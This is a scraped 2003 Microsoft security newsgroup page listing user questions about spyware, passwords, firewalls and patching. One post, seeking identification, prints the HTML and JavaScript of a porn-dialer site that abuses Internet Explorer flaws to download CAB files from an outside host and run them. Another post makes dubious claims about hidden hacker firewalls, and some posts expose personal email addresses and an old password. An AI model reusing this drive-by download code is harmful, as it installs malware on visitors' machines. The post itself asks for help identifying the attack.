Virus?

TheMSsForum.com: The Microsoft Software Forum

The MSS Forum ‹ Security
- Archive
  - Biz
  - MCSE
  - CRM
  - Drivers
  - Framework
  - ADO
  - ASP
  - Compact
  - Forms
  - Dotnet
  - C#
  - VB
  - FontpageGen
  - Excel
  - WorkSheet
  - Exchange
  - Setup
  - Fox
  - Fontpage
  - ASP
  - IIS
  - Entourage
  - Money
  - Messanger
  - PocketPC
  - Powerpoint
  - Project
  - Publisher
  - Excel
  - VB
  - Security
  - Portal
  - Services
  - SQLServerDev
  - SVCS
  - SQLServer
  - VB
  - VC
  - MFC
  - ExcelGen

- Previous
  - 1
    - Event Log On Security Log, Windows 2000NT Professional, what is event #521. Tag: Virus? Tag: 42070
  - 2
    - help i have forgot my password to outlook exs can anyone tell me what i can do i am on win98. thanks. Tag: Virus? Tag: 42068
  - 3
    - Weird start up probs Hi all, When I boot up my laptop (WinXP Home), all most immediately my dial up connection starts up. I have checked all of the dialup connections & they appear to be ok - oh I have compared these settings to a desktop I use (again WinXP Home). Thats the first problem. Now the second problem in my opinion is possibly tied in with the first. When my laptop has successfully logged on I get a toolbar appear & if I click on HOME it takes me to a site www.active-max.com. I must admit it doesnt really bother me to much however reading your groups this might be quite serious & therefore I would like to take some action. I regular use Sybot search & destroy, I use black ice defender as my firewall & use Nortons anti virus. Also I regulary do my microsoft updates. I have also checked in my add & remove programs to ensure there have not been any dodgy software loaded - there is not. Any advice would be greatly appreciated Thank in advance Jim Tag: Virus? Tag: 42065
  - 4
    - internet call waiting I need to know which security update blocks port 7700. i am told by bell south internet call waiting service that this prevents icw form working properly. Tag: Virus? Tag: 42064
  - 5
    - SUS srv problems We have a few Win XP sp1 clients that are hanging during the "applying software policy" portion of the bootup. We apply the WUAU22.msi package via group policy and also change the windows update properties via group policy, so that clients get updates from our local SUS server. I understand that SP1 installed the windows update service, so shouldn't the machines just go past the wuau22.msi package install since they already have the software? Any help would be appreciated. Tag: Virus? Tag: 42063
  - 6
    - ? different type of format? Data recovery folks say they can recover all data not over written on your hd. Is there a program that will over write all sectors/clusters etc. on a hd so that this is not possible and if so who are they? most thankfull Tag: Virus? Tag: 42058
  - 7
    - data security Data recovery folks say they can recover all data not over written on your hd. Is there a program that will over write all sectors/clusters etc. on a hd so that this is not possible and if so who are they? most thankfull. Tag: Virus? Tag: 42056
  - 8
    - search history on the microsoft internet explorer,immediately below the address bar,is a search bar. Can anyone tell me how to clear the search history from this bar? Thanks I.L. Tag: Virus? Tag: 42054
  - 9
    - How to block specified IP in windows 2000 ? HEllo ! How to block specified IP in windows 2000 ? (f.e. 10.1.1.200 ) Tag: Virus? Tag: 42053
  - 10
    - password on opening I would like to set up a password upon opening my computer. I didn't do this when I first got the computer. Can anyone tell me how to go about doing this? I"m working with windows 98 SE. Thank you in advance for your assistance. Tag: Virus? Tag: 42037
  - 11
    - Xp firewall log Hi, How can i view the log file of the ICS firewall built in XP professional or home edition. I have XP professional and the firewall is turned on and i don't know how to view it's log file. Any reply will be appreciated Thanks Amanda Tag: Virus? Tag: 42033
  - 12
    - outlook express spam i have email coming into my outlook express which i would rather not have, i have sent a message back to the company who sent the message saying that they are spamming me and i have blocked there email but i dont want to just block it because when its blocked it just sent to my email bin, what i want to do is to stop it been received by my email in the first place. is there anyway i can do this or is there a way i can only let people on my address book send me mail and thats all ??? any help you can give would be great as i have small kids who use the computer and i dont want them seening some of the crap that is been sent. Tag: Virus? Tag: 42029
  - 13
    - Identify these IE exploits? Hi everyone, I'm trying to help some people who have been the victims of a pretty suspicious porn website that installs dialler programs and stuff on their visitors' computers. The problem is, I know zero about javascript, and am fairly clueless when it comes to IE exploits too, which they seem to use pretty heavily in this case. I think I have the general idea about what happens when people open these webpages (CAB-files get downloaded and executed/installed) but it would be really great if anyone could help me identify in more detail what the javascript code does and what exploits are being used. I'll include three files below. Thanks in advance for any help I can get. Regards, /Ragnar (you can mail user "ragnar" at the domain gatorhole dot se) *** Dump of the HTL file that gets loaded first *** HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Connection: close Date: Fri, 12 Dec 2003 22:10:06 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Wed, 29 Oct 2003 13:15:26 GMT ETag: "bc1ea0b71e9ec31:a64" Content-Length: 1130 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <script> function SetCookie (name,value,expires,path,domain) { document.cookie = name + "=" + escape (value) + ((expires) ? "; expires=" + expires.toGMTString() : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") ; } var expdate = new Date (); expdate.setTime (expdate.getTime() + 60 * 60 * 1000); SetCookie("infoexec1.0_filename", "^smsdial752.exe^dating762.exe^connecting19.exe^", expdate, "/"); </script> <head> <title>Connecting</title> </head> <body bgcolor="#FFFF00" text="#000000"> <table width="300" border="0" align="center" bordercolor="#000000"> <tr> <td> <div align="center"><font size="4"><b>Ansluter till HÅRDPORR......</b></font></div> </td> </tr> </table> <div align="center"><br> <br> <a href="connecting19.htm"><font face="Arial, Helvetica, sans-serif" size="4"><b>SLÄPP IN MIG</b></font></a><br> <br> <br> <br> <br> <br> <br> <bR> <script src=i.js></script> </div> </body> </html> *** Dump of the javascript i.js *** HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Connection: close Date: Fri, 12 Dec 2003 22:13:51 GMT Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Mon, 08 Dec 2003 17:23:47 GMT ETag: "6e6b1bab0bdc31:a64" Content-Length: 2828 cabfile="http://www.sexfiles.nu/newdial/info_sex2.cab"; document.write('<div style="position: absolute; visibility: hidden;"><iframe id=if1></iframe></div>') ; isopen=false; openinsearch=false; usecache=false; function generic() { document.write("<OBJECT CLASSID=clsid:bd11a280-2e73-11cf-b6cf-00aa00a74dae "+ "CODEBASE=http://www.sexfiles.nu/newdial/Info_sex.cab ID=i></OBJECT>"); } function dl_o_inca(){ try{ var f2=new ActiveXObject("Microsoft.XMLHTTP");f2.Open("GET","/scripts/o_inca.htm", false); f2 .Send(); } catch(ex) {} } function s1(){ try{ x=GetObject("C:/WINDOWS/Tempor~1/Content.IE5/INDEX.DAT","htmlfile"); dl_o_inca(); var f0=new ActiveXObject("Microsoft.XMLHTTP");f0.Open("GET",cabfile, false); f0.Send(); setTimeout("s2();",200); } catch(ex){ openinsearch=true; } try{ var s=new ActiveXObject("ADODB.Stream"); } catch(ex){ usecache=true; } if (openinsearch){ __bb=open("http:///","_search"); isopen=true; if (usecache){ setTimeout("__so3()", 500); } else { setTimeout("__so2()", 500); } onunload=closes; setTimeout("closes()", 5000); } } function __so2() { try{ open('file:javascript:eval(\'s=new ActiveXObject(\"ADODB.Stream\");s.Mode=3;s.Type=1;try{s.Open() ;x=new ActiveXObject(\"Microsoft.XMLHTTP\");x.Open(\"GET\",\"'+cabfile.replace(/[/]/g,"%2f")+'\",0);x .Send();s.Write(x.responseBody);s.SaveToFile(\"C:%2fInfo_sex2.cab\",2);s.close();}catch(ex){};try{s.o pen();x.Open(\"GET\",\"http:%2f%2fwww.sexfiles.nu%2fnewdial%2fI-iframe.HTM\",0);x.Send();s.Write(x.re sponseBody);s.SaveToFile(\"C:%2fI.HTM\",2);s.close();}catch(ex){};;document.location=\"C:%2fI.HTM\"\' )',"_search"); } catch(ex) { closes(); generic(); } } function __so3() { try{ dl_o_inca(); var f0=new ActiveXObject("Microsoft.XMLHTTP");f0.Open("GET",cabfile, false); f0.Send(); open('file:javascript:var z_;var a="";var ab="%2fo_inca[1].htm%3f";var xxy=GetObject("C:%2fWINDOW S%2fTempor~1%2fContent.IE5%2fINDEX.DAT","htmlfile");var x=setTimeout("var aa=xxy.body.innerText.subst r(30,80).match(%2f[A-Z0-9]{8}%2fg);for(i=0;i<4;i++){ab+=\\"~\\"+aa[i]};for(i=0;i<4;i++){a+=\\"<iframe src=C:%2fWINDOWS%2fTempor~1%2fContent.IE5%2f\\"+aa[i]+ab+\\"><%2fiframe>\\"};document.write(a)",1000 );var z__;',"_search"); } catch(ex) { closes(); generic(); } } function closes(){ if (isopen==true) { isopen=false; try{__bb.close()}catch(ex){} } } function s2(){ try{ aa=x.body.innerText.substr(30,80).match(/[A-Z0-9]{8}/g); a="";for (i=0;i<4;i++) a+="<iframe src=C:/WINDOWS/Tempor~1/Content.IE5/"+aa[i]+"/o_inca[1].htm?"+aa[0]+"~"+aa[1]+"~"+a a[2]+"~"+aa[3]+"></iframe>"; if1.document.write(a); } catch(ex) { setTimeout("s2();",200); } } onload=s1; onerror=generic; *** Dump of the o_inca.htm file *** HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Connection: close Date: Fri, 12 Dec 2003 22:20:42 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Wed, 03 Dec 2003 16:08:56 GMT ETag: "fa63e1c0b7b9c31:a64" Content-Length: 252 <script> a=document.location.href.substring(document.location.href.length-35).split('~'); for (i in a) document.write('<OBJECT CLASSID=clsid:11111111-1111-1111-1111-11111111111'+i+' CODEBASE="../'+a[i]+ '/info_sex2[1].cab"></OBJECT>'); </script> Tag: Virus? Tag: 42028
  - 14
    - Command Prompt of Firewall Folks: Is there a way to programatically (via DOS) switch on/off the Firewall built into Windows XP ? I have a copy of McAfee Firewall - Personal Edition - installed on my home PC. I just wondering if this program allows itself to be controlled (turned on/off & configured) programmatically ? If so, how can I programmatically (using DOS) turn on/off my Mcafee Firewall and do some other basic configurations from the DOS PROMPT or from a batch file. Thanks, John. Tag: Virus? Tag: 42021
  - 15
    - Virus? Started having strange sound bytes like whistles,voices,snippets of songs, ran a virus scan and had several files infected with sbworm,but they were cleaned or deleted. The sounds remain- don't know if they were connected but I'm manually scanning file and haven't found anything yet. Anyone heard of a virus that leaves behind annoying sound bytes constantly. Its preventing from using the video editing features because of the sounds ending up on the audio tracks. Also, in case someone is not aware if you receive an e-mail from Insta-kiss(or something similar) don't open , an employee's online identiy info including passwords were lifted , and I recently received an email from that sender but deleted it. Tag: Virus? Tag: 42019
  - 16
    - What is "CCEVTMGR.EXE" I turned on my wife's computer today and a Sygate window opened saying Event Manager Service (ccebtmgr.exe) is being contacted from a remote machine crl.verisign.com do you want to allow this program access to the network. Not ever having seen this before I said no. Does anyone know what this is? Thanks, Mac (The computer runs Win98se and I have Sygate Personal Firewall on). Tag: Virus? Tag: 42015
  - 17
    - ** READ THIS BEFORE POSTING - answers to frequently asked questions 2003.12.16 Before you post a question to a Microsoft.public.*.security newsgroup, note that your question may already be answered below: Answers to Top Frequently Asked Questions: http://securityadmin.info My question is not mentioned below. How do I get an answer immediately, with no waiting? http://securityadmin.info/faq.htm#moreinfo See also: http://www.google.com/groups?as_ugroup=microsoft.public.* See also: http://www.google.com/advanced_group_search See also: http://www.google.com I want to post a problem or question to the newsgroup. What info do I need to post in order to get a correct answer quickly? http://securityadmin.info/faq.htm#netiquette I just heard about a new Microsoft security patch update. Where can I get the patch? http://windowsupdate.microsoft.com OR http://www.microsoft.com/technet/security/current.asp I just installed a Microsoft security patch update, and now my computer is having problems. http://securityadmin.info/faq.htm#patchbroke I received an email from Microsoft / Microsoft Support / Microsoft Internet Security Center claiming to be a security patch [or comprehensive Internet Explorer update]. Is this a virus? http://securityadmin.info/faq.htm#microsoftemail ALSO NOTE: www.grisoft.com is free antivirus, USE IT. I received a virus email from a Microsoft email address. Who do I report this to? http://securityadmin.info/faq.htm#microsoftemail I have the RPC Blaster worm "virus," what do I do? http://www.microsoft.com/security/incident/blast.asp ALSO NOTE: www.grisoft.com is free antivirus, USE IT. My computer is giving RPC Remote Procedure Call messages. There is a TFTP message or file on my computer. My computer keeps locking up, and/or rebooting, or telling me that it will reboot in 1 minute. http://www.microsoft.com/security/incident/blast.asp ALSO NOTE: www.grisoft.com is free antivirus, USE IT. Where can I download the Blaster worm / RPC DCOM patch? http://windowsupdate.microsoft.com OR http://www.microsoft.com/technet/security/current.asp I'm having a problem caused by the JDBGMGR.EXE Teddy Bear "virus" hoax, or I want to replace this file. http://securityadmin.info/faq.htm#jdbgmgr I forgot my Windows logon password and can't log in. How do I reset it? http://securityadmin.info/faq.htm#password I have a problem or a question with a virus or with antivirus. http://securityadmin.info/faq.htm#virus NOTE: www.grisoft.com is free antivirus, USE IT. Why is Outlook Express blocking my attachments as "unsafe"? http://securityadmin.info/faq.htm#attachments How do I stop getting pop-up messages? Or adware? Or spyware? http://securityadmin.info/faq.htm#pop-ups How do I block people from viewing adult or objectionable content on a computer? http://securityadmin.info/faq.htm#contentfilter How do I block spam emails? http://securityadmin.info/faq.htm#spam There is a Content Advisor password blocking me from certain web sites. http://securityadmin.info/faq.htm#contentadvisor How do I delete an FTP folder that a hacker put on my computer and I cannot delete? http://securityadmin.info/faq.htm#ftpfolder Have I been hacked? What do I do if I've been hacked? http://securityadmin.info/faq.htm#hacked How do I re-secure a computer that has been hacked? http://securityadmin.info/faq.htm#re-secure How do I test or improve the security on my computer to avoid being hacked? http://securityadmin.info/faq.htm#harden How do I investigate a suspicious IP address that may be trying to hack me? http://securityadmin.info/faq.htm#trace How do I report a hacker? http://securityadmin.info/faq.htm#reporthacker How do I use a port scanner or vulnerability scanner to test my security? http://securityadmin.info/faq.htm#portscanner How do I encrypt my files and/or hard drive? http://securityadmin.info/faq.htm#encryption How do I get a firewall? IDS? http://securityadmin.info/faq.htm#firewall I want to use the IPSec filtering or IP filtering feature of Windows to block certain ports and have a problem or question. http://securityadmin.info/faq.htm#ipsec I have a problem or question with the XP ICF firewall. http://securityadmin.info/faq.htm#icf I have a problem or question with the IIS URLScan tool. http://securityadmin.info/faq.htm#urlscan How do I change the banner on my computer or server to hide what software version I'm using? http://securityadmin.info/faq.htm#banner How do I enable Windows Auditing to tell who logged into Windows or who accessed a file? http://securityadmin.info/faq.htm#auditing How do I inspect and disable programs that start up when Windows starts? http://securityadmin.info/faq.htm#startup How do I use RUNAS or let someone use RUNAS to run commands as administrator without having to type the password? http://securityadmin.info/faq.htm#runas How do I let non-administrator users run Defrag or change their IP address? http://securityadmin.info/faq.htm#runas My question is not mentioned above. How do I get an answer immediately, with no waiting? http://securityadmin.info/faq.htm#moreinfo See also: http://www.google.com/groups?as_ugroup=microsoft.public.* See also: http://www.google.com/advanced_group_search See also: http://www.google.com I want to post a problem or question to the newsgroup. What info do I need to post in order to get a correct answer quickly? http://securityadmin.info/faq.htm#netiquette Note that this is NOT a full list of all the questions answered in the FAQ. Chances are, your question has probably already been answered. The complete FAQ is at: http://securityadmin.info/faq.htm#contents I hope this is helpful. Feedback, suggestions and criticism regarding the FAQ are welcome and may be emailed to me. kind regards, Karl Levinson, CISSP, MCSE, MVP email: levinson_k@despammed.com Tag: Virus? Tag: 42010
  - 18
    - password identification When i set up my mn700 i dont recall assinging it a password, now i am updating and its asking for a password for the base station, Is there a work around or a way to identify the password? Thanks Tag: Virus? Tag: 42006
  - 19
    - Strange Application popup I have the following Application Pop Up in an event log on one of our computers: Event ID: 26 "Application popup: Government Computer : Your ISP will be notified" Is this something that has popped up on the computer in question or is it something that has popped up on a computer trying to log on to the computer? What could trigger an event like that? Tag: Virus? Tag: 42002
  - 20
    - Email Security If public access is necessary for your computer, is there a way to block just anyone from opening your email? I know you can require a password, however, if you hit cancel, the email opens up anyway. This is becoming a real problem, any help would be greatly appreciated. Tag: Virus? Tag: 41995
  - 21
    - X-Box.com/retail security I tried logging into my X-Box retailer training and it ask for a user name and password and I don't know it. I didn't need it yesterday for the same thing. Could someone @ Microsoft tell me how to find out my username and password? Tag: Virus? Tag: 41994
  - 22
    - Per Seat Licences Hi, I've got a web application that runs on an intranet, ASP pages as the user interface, VB6 business layer and an SQL Server database. Is there anyway that I can restrict the number users who can use the site at any one time? Users are not connecting anonymously, if that helps. Thanks for any help. Iain Tag: Virus? Tag: 41992
  - 23
    - CONECTAR CON DIALER DE PRU... KEEP GETTING THIS APPEARING ON DESKTOP, SAYS FROM MICROSOFT, TARGET SEEMS TO BE, RUN DLL32. RUN DLL AS APP. ANY IDEAS? Tag: Virus? Tag: 41979
  - 24
    - Outlook Express acting weird after removing spyware Ever since I searched and destroyed spyware and parasites, (spybot, ad-aware, HijackThis)Every time I load my find more of the leaches in my history and cookies. I am following the advice, thank you very much, and went through step-by-step "Dealing With Unwanted Spyware and Parasites". I tried to download a freeware firewall, however, this particular site confirms through Email. The problem is, when I try to connect to the site or any site via Email, I get a blank browser, absolutely blank, even the address box. How can I fix this? Tag: Virus? Tag: 41975
  - 25
    - THE BEST KEPT SECRETS OF THE COMPUTER UNDERGROUND Remember, you heard this from me first. Installing a backdoor for future and continued access to your computer system is simple once a computer system is compromised. Here are the "Malicious Hackers Best Kept Secrets"! They install a Trojan Horse which disables your anti-virus and firewall protection; also, they install a second set of their own hidden firewall application(s) to protect their Virtual Private Network(s). The point that I am trying to make is this, you can check your system for a Backdoor, Trojan Horse, Virus, or Worm until your blue in the face, you wouldn?t find any. The hackers own firewall application(s) can be installed on your hard drive in a hidden folder and the only way you would know it?s there is by going to your Control Panel, Folder Options, View, Show All Files and Folders (Windows ME and earlier). Windows keeps files and folders hidden by default so you don?t make changes to their important files. You need to View all Files and Folders on your computer to reveal what malicious hackers have installed without your knowledge. This will open your eyes and show you all the files and software applications now sitting on your hard drive. If you want to learn more about computer security, if you?re a beginner, one avenue is to read-up on configuring your mail and browsing applications. Google and Yahoo also have Newsgroups and message boards pertaining to the aforementioned. If utilizing a Windows platform, do some reading on configuring your Windows Internet Options both Internet and Local Settings. Also, spend time learning what applications in Windows are running and on what port they run on. What to learn about Computers, the Internet and Hacking, visit: geocities.com/hacking_internet_secrets. Tracker Tag: Virus? Tag: 41974
- Next
  - 1
    - net Same as many others. Cannot get into things because of net passport.want to remove it and did so yesterday, but to-day it seems I still have an account when I try to log onto some sites? Will not accept my old password that I deleted and will not let me change it as it won't even accept I'm a UK resident. Any help please. Microsoft support is useless and one can waste hours, and I can't even post a question without a passport. How on earth does one get rid of this. Many Thanks Steve Tag: Virus? Tag: 41973
  - 2
    - Giving computer away Hello, I am planing on upgrading my winXP computer soon, and I would like to donate it. Is their anything I can do short of a reformat and reinstall to scrub the computer of personal data? I would prefer to aviod the hassel of a reinstall if at all possible. Thanks for the advice. Tag: Virus? Tag: 41968
  - 3
    - someone gave my e-mail adress away & i know who!!!! I have a co. that i was trying to do busness with ant thave not done ther part of the contrack. they keep saying the it will work but it will not. they clame that it will and even when they are on line trying to trouble shot it will not work. this person has given my e-mail adress to the pron web site. i hav as of to day receved over 5000 porn e-mail my granddarter which helps me with the buisness i can not let her retreave me e-mail anymore. i can not change my e-email adress for it will cost me 1000s for new letter head, cards, and adress accounts but if this keeps up i may have to. the last time i talked to the they put my e-mail adress on a spam list so know i can not even get in to talk to them. help paul cdp1997@netins.net put in subject line help - help - help other wise I don't know if it is pron or npt Tag: Virus? Tag: 41966
  - 4
    - WHATS RELATED - how do i turn off? How do I get the stupid whats related stuff out of my computer? I ran adaware and other spyware killers yet I still get links on my webpages that aren't really links. These are being processed and added at my end - they are NOT actually on the webpage. I don't have anything under my TOOLS menu for Whats Related and I've killed the ALEXA registry entry... ITS STILL HAPPENING! Tag: Virus? Tag: 41962
  - 5
    - Cannot Open Attachments Today I updated my Outlook Express to version 6 and now I cannot open any attachments, even the ones I previously opened before the upgrade. Is there an option In OE that will allow me to be to open attachments if I choose to open them? Tag: Virus? Tag: 41961
  - 6
    - email password My email account is being broken into by another user and i can't figure out how this is done.This person does not have my email account password ,nor did i write it down anywhere.This person is able to log onto the web and by using certain info or get your server to give them access to my account. I would like to know how i can prevent them form breaking into my account using whatever means they are using. Please advise me as to how i should go about doing this v/r eudes james Tag: Virus? Tag: 41957
  - 7
    - tracking use of shared drive A co-worker and I came across a confidential file on our shared drive. Can the IT people tell who accessed this file? Don't ask why, but I copied it to my desktop before I opened it (OK, I thought this would be less traceable). I have deleted it from my desktop. What kind of information can they garner concerning access of shared files? Thanks Tag: Virus? Tag: 41956
  - 8
    - PLESE PLESE I LOST MY ACONT IN HOTMAIL SOME ONE CHANG ALL MY DATALS AND I CAN'T OPIN MY MAIL I'M MOHAMED GRDAWY AND THE MAIL THAT I LOST IT IS MOHAMED_GRDAWY@HOTMAIL.COM CAN YOU PLESE SEND ME THE PASSWORD THE OLD PASSWORD IS ******** AND BEFOR IT THE PASSWORD WAS 4884555012 THAT IS MY OLD PASSWORD CAN YOU PLESE SEND ME MY PASSWORD AT MY YAHOO MAIL IS MOHAMED_GRDAWY@YAHOO.COM THANKS Tag: Virus? Tag: 41955
  - 9
    - Malicious Script - Outlook Express I have downloaded the latest service pack for Outlook Express 6 and still get the message from Norton Antivirus: Malicious Script Object: Windows Scripting Host Shell Object Activity: RegWrite File: Unknown Sometime the message gives the activity as 'Run'. I'm running Windows 98 with the latest security patches. Help please ? Tag: Virus? Tag: 41954
  - 10
    - IE6 after removing a trojan virus i cannot access the search function from the start menu, neither can i open a page in a new window. Have followed the site instructions but no joy. Also my home page keeps being changed to Search-space. Any ideas? Tag: Virus? Tag: 41950
  - 11
    - SamChangePasswordUser2 I am constantly receiving the following message in the passwd log file on a server running sbs 2000. Does anyone know if this is a hack attempt / how to prevent? 12/15 10:34:02 Attempting password change server/domain <domain name> for user TsInternetUser 12/15 10:34:02 SamChangePasswordUser2 on machine \\<server> for user TsInternetUser returned 0xc0000022 12/15 10:34:02 SamChangePasswordUser2 retry on machine \\<server> for user TsInternetUser returned 0xc0000022 Tag: Virus? Tag: 41937
  - 12
    - Microsoft Security Bulletin MS03-043 Is it advisable to download ALL MS Security Bulletin fixes? The description of this bulletin refers to a 64- bit system and I don't know if that applies to me or not. Tag: Virus? Tag: 41936
  - 13
    - sending to large numbers of people without compromising their security Hi, I want to send an e-mail to about 100 people but but don't want to compromise their security by revealing theri addresses. How do I do this? Tag: Virus? Tag: 41932
  - 14
    - W32Nimda_E I have a computer that has been infected by the W32Nimda_E virus. The most obvious effect is to make IE6 run extremely slow. I downloaded FxNimdaE.com from Norton, but it can't get rid of it. Anybody got any suggestions. Tag: Virus? Tag: 41931
  - 15
    - Security Update 823559 I have downloaded this update at least a dozen times this year, but when Windows 98 SE scans for updates this item always shows. My download history indicates each download was successful. How do I delete all the previous downloads, and how do I ensure that this download can be done correctly? Thank you Tag: Virus? Tag: 41923
  - 16
    - SUS -- is it really this lacking? Hi ther I've deployed SUS. That bit's all fine and working well (I think) The problem is, I only think it is. As all the documentation says, I need to verify that the patch management is happening on all my machines I'm fully aware of tools like MBSA, MBSACLI, hfnetchk, etc. They all have one problem. They are built as network scanners and a machine that is turned off at the time you run the scan will not be scanned I would like to be able to run MBSA on each machine at startup or when a user logs in. This would ensure that machines are scanned regularly. If I relied on regular scanning from my workstation, I would not scan any machine that boots up only in the evening. Also, laptops that come on site for only a few hours a month can be scanned as well. In this scenario, the very machines that present the greatest risk to a business are the ones that don't get scanned Back to running MBSACLI on bootup or login -- I can't! MBSA only runs with administrative rights! What's more, if I use a computer startup script in group policy, the process runs under the system account and can't attach to the network to get the mssecure.xml file or to connect to SUS Am I the only one who thinks this is a severe shortcoming? Bigger environments can afford SMS (both the product cost and the skills required to administer it). In a 250-user environment this just isn't going to happen. Tag: Virus? Tag: 41921
  - 17
    - why they keep coming back? Hi, I use ad-aware 6 and also like to use the online scanner Pestscan simultaneously-They dont always find the same spyware but I'd guess they do OK. Here's is my concern. I got online and scanned with PS and then AAW. Cleaned out all they detected. Then I went to this NGroup & read some>then to see updates at windows>then to check my mail at yahoo>then did a housecall virus scan (pc was virus free>I did not go to anymore websites. So why is it when I scanned again with PS, it found "counterhit click (or something like that)& 207{1} txt in my cookies in the "c" drive.MY QUESTION: does this spyware just creep in because it already knows my IP address and whe Im online, it takes advantage of this- I'd like to understand more about this. please help Tag: Virus? Tag: 41917
  - 18
    - Blocking local users from using Messenger Service Heres the scenario: Recently we have had a group of users using Messenger Service to distribute messeges etc. I have since disabled the service through control pannel --> services. How do I prevent them from simply going back into control pannel --> services and re-enabling the service? The trouble is that they need to have the profile set as power users so that it can run certain programs. All I want to do is disable their access to the contol pannel, but keep them as power users. Can this be done? If so... how? Many thanks, Tag: Virus? Tag: 41915
  - 19
    - passport .net Installing a new computer for my 11 year old son, set him up for Passport .net before reading the kids passport post completely. Have spent the last hour looking for how to uninstall passport .net and can't find any instructions ANYWHERE. I want this thing off my son's machine because it will tell people how old he is and where he lives, or so it says. If anyone can tell me how to do it I would be most grateful. Imagine Microsoft setting up this service without an obvious uninstall-- it is shameful. Tag: Virus? Tag: 41913
  - 20
    - My browser is being hijacked Every time I open IE Explorer, I get redirected to zestyfind. I can't get rid of it. I've used spyware removal, but it comes back up. I've tried deleting any files associated with it as well, but it still comes up. Every time I do a search, or load a favorite, I am redirected to a place called UCSearch. I am very frustrated, as I have tried everything I know to get this off my system, but it keeps coming back. I also installed the latest IE service\security pack, to no avail. If anyone has any ideas, please let me know. Tag: Virus? Tag: 41906
  - 21
    - I cant open my email count any more:( Dear Sir: I found that I cant use my email count yesterday, I tried several time but I just cant use my passwords log in as before. I do nto know why, and I didnt change my password, and I never tell others about my password as well. and I do not think others can see my passaword too because I m only myself in the home. I hope you can tell me what happened on my count and better can let me use the count again. Can you reply to me in my yahoo count? it is sweetlover1314a@yahoo.com thanks Eve Tag: Virus? Tag: 41901
  - 22
    - patching 4.0 Has anyone had trouble applying patches to NT 4.0 with sp 6a applied ?? Tag: Virus? Tag: 41897
  - 23
    - web camera in the MSN massenger i have a web cam that was working perfectly well, i could always see peaple in the messanger and they could see me, until the previous week, something went wrong, i dont realy know what, but maybe it's because i upgraded my massenger to version 6.1 , although my friends dont have a problem with it. anyway, now i can only see myself in the program of the camera but in the msn it doesnt work please HELP me thank you, Liron. Tag: Virus? Tag: 41894
  - 24
    - Alexa Data Miner Ad-Aware scan picks up Alexa as a Register Key and "Windows" as a Registry value. Should I Quarantine or Remove either or both of these? I seem to remember reading someplace that Microsoft (or Windows) included Alexa intentionally. My last scan picked up 54 new Suspect Files in Temp. - is that normal or unusual? I find the Ad-Aware User Guide to be pretty heavy. Just leaving it on Default, but the scan takes quite awhile, deep scanning all of my hard drive. Advice?? Tag: Virus? Tag: 41893
  - 25
    - securty update for Windose ME Why does critical update EXPLORER 6 SPI KB824145 LOADED 20 TIMES IN MY HISTORY FILE OF FILES DOWN LOADED Tag: Virus? Tag: 41892

Dirk,

Thanks for the info......but like I said, I regulary use
sybot.
Any other ideas?

Jim

Virus? by Jim

Jim
Wed Dec 17 11:00:23 CST 2003

MS,

I keep getting this message when posting a reply to Weird
start up probs @Dec17 2003 7:16AM

Probs your end ???

As you can see I can post a reply to this!

Top